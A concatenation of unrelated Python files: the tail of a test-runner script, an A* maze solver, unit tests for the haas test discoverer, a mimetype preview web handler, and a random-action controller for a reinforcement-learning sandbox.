parts = os.path.splitext(touched_file)[0].split(os.sep)
touched_module = ".".join(parts)
# test/ path does not have a "test." namespace
if touched_module.startswith('test.'):
touched_module = touched_module.split('test.')[1]
if (
touched_module in dep_modules
or touched_module == test.replace('/', '.')
):
log_test_reason(file_type, touched_file, test, options)
return True
# If nothing has determined the test has run, don't run the test.
if options.verbose:
print_to_stderr(f'Determination is skipping {test}')
return False
def run_test_module(test: str, test_directory: str, options) -> Optional[str]:
test_module = parse_test_module(test)
# Printing the date here can help diagnose which tests are slow
print_to_stderr('Running {} ... [{}]'.format(test, datetime.now()))
handler = CUSTOM_HANDLERS.get(test_module, run_test)
return_code = handler(test_module, test_directory, options)
assert isinstance(return_code, int) and not isinstance(
return_code, bool), 'Return code should be an integer'
if return_code == 0:
return None
message = f'{test} failed!'
if return_code < 0:
# subprocess.Popen returns the child process' exit signal as
# return code -N, where N is the signal number.
signal_name = SIGNALS_TO_NAMES_DICT[-return_code]
message += f' Received signal: {signal_name}'
return message
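# Note: a child killed by SIGSEGV reports return_code == -11 (on Linux), so the
# lookup above resolves SIGNALS_TO_NAMES_DICT[11] to 'SIGSEGV' for the message.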
def export_S3_test_times(test_times_filename: str, test_times: Dict[str, float]) -> None:
if os.path.exists(test_times_filename):
print(f'Overwriting existing file: {test_times_filename}')
with open(test_times_filename, 'w+') as file:
job_times_json = get_job_times_json(test_times)
json.dump(job_times_json, file, indent=' ', separators=(',', ': '))
file.write('\n')
def query_changed_test_files() -> List[str]:
cmd = ["git", "diff", "--name-only", "origin/master", "HEAD"]
proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if proc.returncode != 0:
raise RuntimeError("Unable to get changed files")
lines = proc.stdout.decode().strip().split("\n")
lines = [line.strip() for line in lines]
return lines
def reorder_tests(tests: List[str]) -> List[str]:
try:
changed_files = query_changed_test_files()
except Exception:
# If unable to get changed files from git, quit without doing any sorting
return tests
prefix = f"test{os.path.sep}"
changed_tests = [f for f in changed_files if f.startswith(prefix) and f.endswith(".py")]
changed_tests = [f[len(prefix):] for f in changed_tests]
changed_tests = [f[:-len(".py")] for f in changed_tests]
bring_to_front = []
the_rest = []
for test in tests:
if test in changed_tests:
bring_to_front.append(test)
else:
the_rest.append(test)
sorted_tests = bring_to_front + the_rest
if len(sorted_tests) != len(tests):
# Something went wrong, bail out without doing any sorting
return tests
return sorted_tests
def main():
options = parse_args()
test_times_filename = options.export_past_test_times
if test_times_filename:
print(f'Exporting past test times from S3 to {test_times_filename}, no tests will be run.')
export_S3_test_times(test_times_filename, pull_job_times_from_S3())
return
test_directory = os.path.dirname(os.path.abspath(__file__))
selected_tests = get_selected_tests(options)
if options.verbose:
print_to_stderr('Selected tests: {}'.format(', '.join(selected_tests)))
if options.coverage and not PYTORCH_COLLECT_COVERAGE:
shell(['coverage', 'erase'])
if options.jit:
selected_tests = list(filter(lambda test_name: "jit" in test_name, TESTS))  # list() so len() and re-iteration work downstream
if options.determine_from is not None and os.path.exists(options.determine_from):
slow_tests = get_slow_tests_based_on_S3()
print('Added the following tests to target_det tests as calculated based on S3:')
print(slow_tests)
with open(options.determine_from, 'r') as fh:
touched_files = [
os.path.normpath(name.strip()) for name in fh.read().split('\n')
if len(name.strip()) > 0
]
# HACK: Ensure the 'test' paths can be traversed by Modulefinder
sys.path.append('test')
selected_tests = [
test for test in selected_tests
if determine_target(TARGET_DET_LIST + slow_tests, test, touched_files, options)
]
sys.path.remove('test')
selected_tests = reorder_tests(selected_tests)
has_failed = False
failure_messages = []
try:
for test in selected_tests:
options_clone = copy.deepcopy(options)
if test in USE_PYTEST_LIST:
options_clone.pytest = True
err_message = run_test_module(test, test_directory, options_clone)
if err_message is None:
continue
has_failed = True
failure_messages.append(err_message)
if not options_clone.continue_through_error:
raise RuntimeError(err_message)
print_to_stderr(err_message)
finally:
if options.coverage:
from coverage import Coverage
test_dir = os.path.dirname(os.path.abspath(__file__))
with set_cwd(test_dir):
cov = Coverage()
if PYTORCH_COLLECT_COVERAGE:
cov.load()
cov.combine(strict=False)
cov.save()
if not PYTORCH_COLLECT_COVERAGE:
cov.html_report()
if options.continue_through_error and has_failed:
for err in failure_messages:
print_to_stderr(err)
sys.exit(1)
if __name__ == '__main__':
main()
|
class Node:
def __init__(self, position, parent):
self.position = position
self.parent = parent
self.g = 0
self.h = 0
self.f = 0
def __eq__(self, other):
return self.position == other.position
def __lt__(self, other):
return self.f < other.f
def __repr__(self):
return '({0},{1})'.format(self.position, self.f)
def draw_grid(map, width, height, spacing=2, **kwargs):
for y in range(height):
for x in range(width):
print('%%-%ds' % spacing % draw_tile(map, (x, y), kwargs), end='')
print()
def draw_tile(map, position, kwargs):
value = map.get(position)
if 'path' in kwargs and position in kwargs['path']: value = '+'
if 'start' in kwargs and position == kwargs['start']: value = '@'
if 'goal' in kwargs and position == kwargs['goal']: value = '$'
return value
def astar_search(map, start, end):
open = []
closed = []
start_node = Node(start, None)
goal_node = Node(end, None)
open.append(start_node)
while len(open) > 0:
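# Sorting by f (via Node.__lt__) makes `open` act as a simple priority queue;
# heapq would scale better on large grids.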
open.sort()
current_node = open.pop(0)
closed.append(current_node)
if current_node == goal_node:
path = []
while current_node != start_node:
path.append(current_node.position)
current_node = current_node.parent
return path[::-1]
(x, y) = current_node.position
neighbors = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]
for next_position in neighbors:
map_value = map.get(next_position)
if map_value == '#':
continue
neighbor = Node(next_position, current_node)
if neighbor in closed:
continue
# g is the accumulated path cost (one per step), not the straight-line
# distance from the start; using the latter breaks A*'s optimality.
neighbor.g = current_node.g + 1
# h is the Manhattan-distance heuristic to the goal.
neighbor.h = abs(neighbor.position[0] - goal_node.position[0]) + abs(
neighbor.position[1] - goal_node.position[1])
neighbor.f = neighbor.g + neighbor.h
if add_to_open(open, neighbor):
open.append(neighbor)
return None
def add_to_open(open, neighbor):
for node in open:
if neighbor == node and neighbor.f >= node.f:
return False
return True
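# Minimal usage sketch (hypothetical inline grid; '#' marks a wall):
#   grid = {(x, y): '.' for x in range(3) for y in range(3)}
#   grid[(1, 1)] = '#'
#   astar_search(grid, (0, 0), (2, 2))  # -> a 4-step path ending at (2, 2)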
def main():
map = {}
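# Seed `chars` with a non-empty value so the read loop below runs at least once.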
chars = ['c']
start = None
end = None
width = 0
height = 0
fp = open('data/maze.in', 'r')  # forward slashes are portable across OSes
while len(chars) > 0:
chars = list(fp.readline().strip())
width = len(chars) if width == 0 else width
for x in range(len(chars)):
map[(x, height)] = chars[x]
if (chars[x] == '@'):
start = (x, height)
elif (chars[x] == '$'):
end = (x, height)
if (len(chars) > 0):
height += 1
fp.close()
path = astar_search(map, start, end)
if path is None:
print('No path to the goal was found.')
return
print()
print(path)
print()
draw_grid(map, width, height, spacing=1, path=path, start=start, goal=end)
print()
print('Steps to goal: {0}'.format(len(path)))
print()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013-2014 Simon Jagoe
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the 3-clause BSD license. See the LICENSE.txt file for details.
from __future__ import absolute_import, unicode_literals
import os
import shutil
import sys
import tempfile
import unittest as python_unittest
from haas.testing import unittest
from haas.tests import _test_cases, builder
from haas.tests.compat import mock
from haas.loader import Loader
from haas.module_import_error import ModuleImportError
from haas.suite import find_test_cases, TestSuite
from haas.utils import cd
from ..discoverer import (
Discoverer,
filter_test_suite,
find_module_by_name,
find_top_level_directory,
get_module_name,
)
class FilterTestCase(_test_cases.TestCase):
pass
class TestDiscoveryMixin(object):
def setUp(self):
self.tmpdir = os.path.abspath(tempfile.mkdtemp())
self.dirs = dirs = ['haas_test_package', 'tests']
path = self.tmpdir
for dir_ in dirs:
path = os.path.join(path, dir_)
os.makedirs(path)
with open(os.path.join(path, '__init__.py'), 'w'):
pass
destdir = os.path.join(self.tmpdir, *dirs)
base = os.path.splitext(_test_cases.__file__)[0]
srcfile = '{0}.py'.format(base)
shutil.copyfile(
srcfile, os.path.join(destdir, 'test_cases.py'))
def tearDown(self):
for key in list(sys.modules.keys()):
if key in sys.modules and key.startswith(self.dirs[0]):
del sys.modules[key]
if self.tmpdir in sys.path:
sys.path.remove(self.tmpdir)
shutil.rmtree(self.tmpdir)
def get_test_cases(self, suite):
for test in find_test_cases(suite):
yield test
class TestFindTopLevelDirectory(TestDiscoveryMixin, unittest.TestCase):
def test_from_top_level_directory(self):
directory = find_top_level_directory(self.tmpdir)
self.assertEqual(directory, self.tmpdir)
def test_from_leaf_directory(self):
directory = find_top_level_directory(
os.path.join(self.tmpdir, *self.dirs))
self.assertEqual(directory, self.tmpdir)
def test_from_middle_directory(self):
directory = find_top_level_directory(
os.path.join(self.tmpdir, self.dirs[0]))
self.assertEqual(directory, self.tmpdir)
def test_from_nonpackage_directory(self):
nonpackage = os.path.join(self.tmpdir, self.dirs[0], 'nonpackage')
os.makedirs(nonpackage)
directory = find_top_level_directory(nonpackage)
self.assertEqual(directory, nonpackage)
def test_relative_directory(self):
relative = os.path.join(self.tmpdir, self.dirs[0], '..', *self.dirs)
directory = find_top_level_directory(relative)
self.assertEqual(directory, self.tmpdir)
def test_no_top_level(self):
os_path_dirname = os.path.dirname
def dirname(path):
if os.path.basename(os_path_dirname(path)) not in self.dirs:
return path
return os_path_dirname(path)
with mock.patch('os.path.dirname', dirname):
with self.assertRaises(ValueError):
find_top_level_directory(os.path.join(self.tmpdir, *self.dirs))
class TestGetModuleName(TestDiscoveryMixin, unittest.TestCase):
def test_module_in_project(self):
module_path = os.path.join(self.tmpdir, *self.dirs)
module_name = get_module_name(self.tmpdir, module_path)
self.assertEqual(module_name, '.'.join(self.dirs))
def test_module_not_in_project_deep(self):
module_path = os.path.join(self.tmpdir, *self.dirs)
with self.assertRaises(ValueError):
get_module_name(os.path.dirname(__file__), module_path)
def test_module_not_in_project_relpath(self):
module_path = os.path.abspath(
os.path.join(self.tmpdir, '..', *self.dirs))
with self.assertRaises(ValueError):
get_module_name(self.tmpdir, module_path)
class TestFindModuleByName(TestDiscoveryMixin, unittest.TestCase):
def setUp(self):
TestDiscoveryMixin.setUp(self)
sys.path.insert(0, self.tmpdir)
def tearDown(self):
sys.path.remove(self.tmpdir)
TestDiscoveryMixin.tearDown(self)
def test_package_in_project(self):
module, case_attributes = find_module_by_name('.'.join(self.dirs))
dirname = os.path.join(self.tmpdir, *self.dirs)
filename = os.path.join(dirname, '__init__')
self.assertEqual(os.path.splitext(module.__file__)[0], filename)
def test_missing_package_in_project(self):
module_name = '.'.join(self.dirs + ['missing'])
module, case_attributes = find_module_by_name(module_name)
dirname = os.path.join(self.tmpdir, *self.dirs)
filename = os.path.join(dirname, '__init__')
self.assertEqual(os.path.splitext(module.__file__)[0], filename)
self.assertEqual(case_attributes, ['missing'])
def test_module_attribute_in_project(self):
module_name = '.'.join(self.dirs + ['test_cases'])
test_case_name = '.'.join([module_name, 'TestCase'])
try:
module, case_attributes = find_module_by_name(test_case_name)
module_file = module.__file__
finally:
del sys.modules[module_name]
dirname = os.path.join(self.tmpdir, *self.dirs)
filename = os.path.join(dirname, 'test_cases')
self.assertEqual(os.path.splitext(module_file)[0], filename)
self.assertEqual(case_attributes, ['TestCase'])
def test_missing_top_level_package_in_project(self):
with self.assertRaises(ImportError):
find_module_by_name('no_module')
class TestFilterTestSuite(unittest.TestCase):
def setUp(self):
self.case_1 = _test_cases.TestCase(methodName='test_method')
self.case_2 = _test_cases.TestCase(methodName='_private_method')
self.case_3 = FilterTestCase(methodName='_private_method')
self.suite = TestSuite(
[
TestSuite(
[
self.case_1,
self.case_2,
],
),
TestSuite(
[
self.case_3,
],
),
],
)
def tearDown(self):
del self.suite
del self.case_3
del self.case_2
del self.case_1
def test_filter_by_method_name(self):
filtered_suite = filter_test_suite(self.suite, 'test_method')
self.assertEqual(len(filtered_suite), 1)
test, = filtered_suite
self.assertIs(test, self.case_1)
def test_filter_by_class_name(self):
filtered_suite = filter_test_suite(self.suite, 'FilterTestCase')
self.assertEqual(len(filtered_suite), 1)
test, = filtered_suite
self.assertIs(test, self.case_3)
def test_filter_by_module_name(self):
filtered_suite = filter_test_suite(self.suite, '_test_cases')
self.assertEqual(len(filtered_suite), 2)
test1, test2 = filtered_suite
self.assertIs(test1, self.case_1)
self.assertIs(test2, self.case_2)
def test_filter_by_package_name(self):
filtered_suite = filter_test_suite(self.suite, 'test_discoverer')
self.assertEqual(len(filtered_suite), 1)
test, = filtered_suite
self.assertIs(test, self.case_3)
def test_filter_by_nonexistant_name(self):
filtered_suite = filter_test_suite(self.suite, 'nothing_called_this')
self.assertEqual(len(filtered_suite), 0)
def test_filter_by_class_and_test_name(self):
filtered_suite = filter_test_suite(
self.suite, 'TestCase.test_method')
self.assertEqual(len(filtered_suite), 1)
test, = filtered_suite
self.assertIs(test, self.case_1)
def test_filter_by_module_and_class(self):
filtered_suite = filter_test_suite(
self.suite, '_test_cases.TestCase')
self.assertEqual(len(filtered_suite), 2)
test1, test2 = filtered_suite
self.assertIs(test1, self.case_1)
self.assertIs(test2, self.case_2)
def test_filter_by_module_and_class_and_test(self):
filtered_suite = filter_test_suite(
self.suite, '_test_cases.TestCase.test_method')
self.assertEqual(len(filtered_suite), 1)
test1, = filtered_suite
self.assertIs(test1, self.case_1)
class TestDiscoveryByPath(TestDiscoveryMixin, unittest.TestCase):
def setUp(self):
TestDiscoveryMixin.setUp(self)
self.discoverer = Discoverer(Loader())
def tearDown(self):
del self.discoverer
TestDiscoveryMixin.tearDown(self)
def assertSuite(self, suite):
self.assertIsInstance(suite, TestSuite)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_from_top_level_directory(self):
suite = self.discoverer.discover(self.tmpdir)
self.assertSuite(suite)
def test_from_leaf_directory(self):
suite = self.discoverer.discover(os.path.join(self.tmpdir, *self.dirs))
self.assertSuite(suite)
def test_from_middle_directory(self):
suite = self.discoverer.discover(
os.path.join(self.tmpdir, self.dirs[0]))
self.assertSuite(suite)
def test_start_from_nonpackage_directory(self):
nonpackage = os.path.join(self.tmpdir, self.dirs[0], 'nonpackage')
os.makedirs(nonpackage)
suite = self.discoverer.discover(nonpackage)
self.assertEqual(len(list(suite)), 0)
def test_from_nested_nonpackage_directory(self):
"""
Regression test for #38
"""
# Given
nonpackage = os.path.join(self.tmpdir, 'nonpackage')
package = os.path.join(nonpackage, 'nonpackage', 'tests')
os.makedirs(package)
with open(os.path.join(package, '__init__.py'), 'w'):
pass
with open(os.path.join(package, 'test.py'), 'w'):
pass
# When
suite = self.discoverer.discover(nonpackage, nonpackage)
# Then
self.assertEqual(suite.countTestCases(), 0)
def test_relative_directory(self):
relative = os.path.join(self.tmpdir, self.dirs[0], '..', *self.dirs)
suite = self.discoverer.discover(relative)
self.assertSuite(suite)
def test_given_correct_top_level_directory(self):
suite = self.discoverer.discover(
self.tmpdir, top_level_directory=self.tmpdir)
self.assertSuite(suite)
def test_given_incorrect_top_level_directory(self):
with self.assertRaises(ImportError):
self.discoverer.discover(
self.tmpdir,
top_level_directory=os.path.dirname(self.tmpdir),
)
def test_top_level_directory_on_path(self):
sys.path.insert(0, self.tmpdir)
try:
suite = self.discoverer.discover(self.tmpdir)
finally:
sys.path.remove(self.tmpdir)
self.assertSuite(suite)
class TestDiscoveryByModule(TestDiscoveryMixin, unittest.TestCase):
def setUp(self):
TestDiscoveryMixin.setUp(self)
self.discoverer = Discoverer(Loader())
def tearDown(self):
del self.discoverer
TestDiscoveryMixin.tearDown(self)
def test_discover_package(self):
suite = self.discoverer.discover(
'.'.join(self.dirs),
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_package_no_top_level(self):
suite = self.discoverer.discover('haas.tests')
tests = list(self.get_test_cases(suite))
self.assertGreater(len(tests), 1)
def test_discover_module(self):
module = '{0}.test_cases'.format('.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_case(self):
module = '{0}.test_cases.TestCase'.format('.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_missing_case(self):
module = '{0}.test_cases.MissingTestCase'.format('.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 0)
def test_discover_not_case(self):
module = '{0}.test_cases.NotTestCase'.format('.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 0)
def test_discover_method(self):
module = '{0}.test_cases.TestCase.test_method'.format(
'.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_too_many_components(self):
module = '{0}.test_cases.TestCase.test_method.nothing'.format(
'.'.join(self.dirs))
with self.assertRaises(ValueError):
self.discoverer.discover(module, top_level_directory=self.tmpdir)
class TestDiscoverFilteredTests(TestDiscoveryMixin, unittest.TestCase):
def setUp(self):
TestDiscoveryMixin.setUp(self)
self.discoverer = Discoverer(Loader())
def tearDown(self):
del self.discoverer
TestDiscoveryMixin.tearDown(self)
def test_discover_subpackage(self):
suite = self.discoverer.discover(
'tests',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_test_method(self):
suite = self.discoverer.discover(
'test_method',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_class(self):
suite = self.discoverer.discover(
'TestCase',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_no_top_level(self):
getcwd = mock.Mock()
getcwd.return_value = self.tmpdir
with mock.patch.object(os, 'getcwd', getcwd):
suite = self.discoverer.discover(
'TestCase',
)
getcwd.assert_called_once_with()
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_class_and_method(self):
suite = self.discoverer.discover(
'TestCase.test_method',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_module_and_class_and_method(self):
suite = self.discoverer.discover(
'test_cases.TestCase.test_method',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_module_and_class(self):
suite = self.discoverer.discover(
'test_cases.TestCase',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
class TestDiscovererImportError(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module1 = builder.Module('test_something.py', (klass,))
module2 = builder.Module('test_something_else.py', (klass,))
subpackage = builder.Package(
'subpackage',
(
builder.Package('package1', (module1,)),
builder.Package('package2', (module2,)),
),
)
package = builder.Package('package', (subpackage,))
fixture = builder.Package('fixture', (package,))
fixture.create(self.tempdir)
module_path = os.path.join(
self.tempdir, fixture.name, package.name, subpackage.name,
module1.name)
with open(module_path, 'w') as fh:
fh.write('import haas.i_dont_exist\n')
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_creates_importerror_testcase(self):
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(
self.tempdir, self.tempdir)
self.assertEqual(suite.countTestCases(), 3)
case_names = [
type(case).__name__ for case in find_test_cases(suite)]
self.assertEqual(
case_names, ['ModuleImportError', 'TestSomething',
'TestSomething'])
def test_importerror_testcase(self):
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(
self.tempdir, self.tempdir)
self.assertEqual(suite.countTestCases(), 3)
result = unittest.TestResult()
suite.run(result)
self.assertEqual(len(result.errors), 1)
class TestDiscovererNonPackageImport(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module1 = builder.Module('test_something.py', (klass,))
module2 = builder.Module('test_something_else.py', (klass,))
subpackage = builder.Directory(
'subpackage',
(
builder.Package('package1', (module1,)),
builder.Package('package2', (module2,)),
),
)
package = builder.Directory('package', (subpackage,))
fixture = builder.Directory('fixture', (package,))
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_skips_non_packages(self):
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(self.tempdir, self.tempdir)
self.assertEqual(suite.countTestCases(), 0)
class TestDiscovererDotInModuleName(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
expected_klass = builder.Class(
'TestExpected',
(
builder.Method('test_expected'),
),
)
module1 = builder.Module('test_some.thing.py', (klass,))
module2 = builder.Module('test_something_else.py', (klass,))
module3 = builder.Module('test_another_one.py', (expected_klass,))
subpackage = builder.Package(
'subpackage',
(
builder.Package('package1', (module1,)),
builder.Package('packa.ge2', (module2,)),
builder.Package('package3', (module3,)),
),
)
package = builder.Package('package', (subpackage,))
fixture = builder.Package('fixture', (package,))
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(self.tempdir, self.tempdir)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertEqual(type(case).__name__, 'TestExpected')
self.assertEqual(case._testMethodName, 'test_expected')
class TestDiscovererNeverFilterModuleImportError(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
text = builder.RawText('ImportError', 'import haas.i_dont_exist')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module = builder.Module('test_importerror.py', (text, klass,))
package = builder.Package('package', (module,))
fixture = builder.Package('fixture', (package,))
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover('TestSomething', None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertIsInstance(case, ModuleImportError)
self.assertEqual(case._testMethodName, 'test_error')
class TestDiscovererSelectiveFilterPackageImportError(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
text = builder.RawText('ImportError', 'from . import i_dont_exist')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module = builder.Module('test_importerror.py', (klass,))
fixture = builder.Directory(
'testing_package',
(
builder.Module('__init__.py', (text,)),
module,
),
)
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover('TestSomething', None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertIsInstance(case, ModuleImportError)
self.assertEqual(case._testMethodName, 'test_error')
class TestDiscovererFindTestsByFilePath(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module = builder.Module('test_something.py', (klass,))
package = builder.Package('package', (module,))
fixture = builder.Package('fixture', (package,))
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests_no_prefix_dot_slash(self):
# Given
start = 'fixture/package/test_something.py'
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(start, None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertEqual(type(case).__name__, 'TestSomething')
self.assertEqual(case._testMethodName, 'test_method')
def test_discover_tests_with_dot_slash(self):
# Given
start = './fixture/package/test_something.py'
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(start, None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertEqual(type(case).__name__, 'TestSomething')
self.assertEqual(case._testMethodName, 'test_method')
class TestDiscovererEmacsRecoveryFiles(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
# Both the Emacs recovery file and the real module must exist so that
# discovery can be shown to skip the former.
recovery_module = builder.Module('.#test_module.py', (klass,))
module = builder.Module('test_module.py', (klass,))
fixture = builder.Package(
'testing_package',
(
recovery_module,
module,
),
)
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_error_emacs_recovery_file(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover('TestSomething', None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertIsInstance(case, unittest.TestCase)
self.assertEqual(case._testMethodName, 'test_method')
class TestDiscovererExceptionOnModuleImport(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
text = builder.RawText('RuntimeError', 'raise RuntimeError("failed")')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module = builder.Module('test_importerror.py', (text, klass,))
fixture = builder.Package(
'testing_package',
(
module,
),
)
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests_runtime_error_on_import(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover('TestSomething', None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertIsInstance(case, ModuleImportError)
self.assertEqual(case._testMethodName, 'test_error')
|
from vobla.utils import api_spec_exists
from vobla.handlers import BaseHandler
from vobla.utils.mimetypes import get_mimetype_preview
@api_spec_exists
class MimetypePreview(BaseHandler):
async def get(self, mimetype):
"""
---
description: Get mimetype preview image
tags:
- mimetypes
parameters:
- in: path
name: mimetype
type: string
responses:
200:
description: OK
"""
self.set_header("Content-Type", "image/png")
with open(get_mimetype_preview(mimetype), "rb") as mimetype_preview:
self.write(mimetype_preview.read())
self.set_status(200)
self.finish()
|
# Author: Birnadin Erick
# Copyright © 2021. All rights reserved by Birnadin Erick.
# This script may be used for personal or commercial purposes without written acknowledgement from the author.
#
|
from sandbox.ours.controllers.base import Controller
class RandomController(Controller):
def __init__(self, env):
self.env = env
super().__init__()
def get_action(self, state):
""" randomly sample an action uniformly from the action space """
return self.env.action_space.sample()
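# Usage sketch (assumes a gym-style env exposing `action_space.sample()`):
#   controller = RandomController(env)
#   action = controller.get_action(state)  # `state` is ignored by design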
|
